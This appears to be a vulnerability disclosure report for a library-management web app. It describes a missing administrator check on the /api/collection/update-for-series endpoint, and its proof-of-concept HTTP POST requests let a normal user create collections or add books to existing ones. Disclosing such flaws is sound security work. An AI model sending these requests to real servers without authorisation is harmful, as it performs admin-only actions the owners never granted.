Description

A normal user can create a new collection with the provided book ids or add new books to an existing collection, whose operations should be only executed by the administrator.


This is possible due to an missing administrative role check in the /api/collection/update-for-series API endpoint.

Proof of Concept

Create a new collection:

1 - Send the following request, where collectionTagId=0 attribute value, indicates the creation of a new collection and the seriesID array attribute contains all the book ids that will be added to the collection:

POST http://localhost:5000/api/collection/update-for-series
Authorization: Bearer <token>
Content-Type: application/json

{"collectionTagId":0,"collectionTagTitle":"Collection3","seriesIds":[1,2,3,4,5]}

Add new books to an existing collection:

1 - Send the following request, where collection-id value has the target collection id, and the seriesID array attribute contains all the new book ids that will be added to the collection:

POST http://localhost:5000/api/collection/update-for-series
Authorization: Bearer <token>
Content-Type: application/json

{"collectionTagId":<collection-id>,"collectionTagTitle":"New title","seriesIds":[3,4,5]}